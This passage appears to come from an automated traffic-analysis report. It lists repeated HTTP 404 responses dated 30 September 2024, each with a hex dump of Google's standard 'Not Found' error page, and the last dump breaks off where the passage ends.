                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:02 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:03 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:04 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:08 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:09 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 